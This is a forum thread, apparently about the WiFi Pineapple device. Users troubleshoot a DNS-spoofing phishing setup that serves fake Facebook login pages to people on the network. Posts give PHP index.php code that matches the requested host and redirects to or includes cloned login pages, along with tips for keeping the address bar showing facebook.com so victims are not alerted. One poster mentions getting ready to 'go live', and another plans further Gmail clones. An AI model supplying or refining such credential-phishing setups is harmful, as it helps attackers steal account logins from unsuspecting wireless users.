Question About Dns Spoof / Phishing

RichyB

I have followed the steps on wifipineapple.com on how to setup your usb / phineapple to allow phishing the

problem is when i test it and go to say facebook it gets picked up by the dns spoof and sends it to the pineapple

but it only lists the files in the directory and doesnt point to redirect.php

Can one of you linux guru's help a newbie out

Hope you understand whats going on if not just ask

I have followed the steps on wifipineapple.com on how to setup your usb / phineapple to allow phishing the

problem is when i test it and go to say facebook it gets picked up by the dns spoof and sends it to the pineapple

but it only lists the files in the directory and doesnt point to redirect.php

Can one of you linux guru's help a newbie out

Hope you understand whats going on if not just ask

what pineapple do you have mk3 mk4 ect.

What files are in your www dir?

I had the same problem. The mark4 with 1.1.1 software is looking for a php page on index.php. Index.html to Redirect.php is not needed anymore. Here is my code for index.php;

<?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, 'facebook.com') !== FALSE){ header('Location: facebook.html') ;}

exit;

require('error.php');

?>

I had the same problem. The mark4 with 1.1.1 software is looking for a php page on index.php. Index.html to Redirect.php is not needed anymore. Here is my code for index.php;

<?php

if (strpos($ref, 'facebook.com') !== FALSE){ header('Location: facebook.html') ;}

exit;

require('error.php');

?>

One thing I found when comming up with my random roll script V2 was if your facebook.html was in /www/ you could replace the header('Location: facebook.html') with include("facebook.html") that way your link would look like facebook.com and not facebook.com/facebook.html

now if your facebook.html was located outside of /www/ say /www/web/spoof/ you would have to make all links inside that .html file absolute IE /web/spoof/facebook.gif and so on

Sweet deal, thank you.

I had include at one time, but was hacking at the php code trying different things and it got left at what it is now.

I like the current just because it says facebook.html....I know its working via the browser address, but when im ready to go live i will change it.

iv deleted the redirect.php and index.html and put that script into index.php but at the moment it still just shows the content of the directory rather than defaulting to the index.php

same here:

my index.php

if (strpos($ref, 'facebook.com') !== FALSE){ include('/phishing/facebook/login.html') ;}
exit;
require('error.php');
?&gt;

my phishing page is located in /usb/www/phishing/facebook/

any ideas?

have fun

Edited by macopo

i had to clear my cache for some reason..

its working now ne way

Marcopo: my facebook.html is in the same directory as index.php so i dont have to pas a full path i just have : ('facebook.html')

the facebook.html then links to the /facebook_files/ folder

i had to clear my cache for some reason..

its working now ne way

Marcopo: my facebook.html is in the same directory as index.php so i dont have to pas a full path i just have : ('facebook.html')

the facebook.html then links to the /facebook_files/ folder

Thx for your post.

It was working for me, like it works for you know.

I put the login.html in the root-folder (same folder as index.php) and it works fine.

My problem is, that I have a few more projects, like FB, GMail and so on.

That means, that I have to change in every single file the paths to the right directory. This can take a very long time.

Also I have to have many *.html files in my root and would like to have it a little structured.

Also there can be some more projects comming.

I do not know why, but for some reason the path to the login.html-file cannot be found. It is in the facebook-folder.

I thought i could do something like this :

if (strpos($ref, 'facebook.com') !== FALSE){
 include(/phising/facebook/login.html');
}

but apparently this include-command does not work.

do you maybe have any idea why?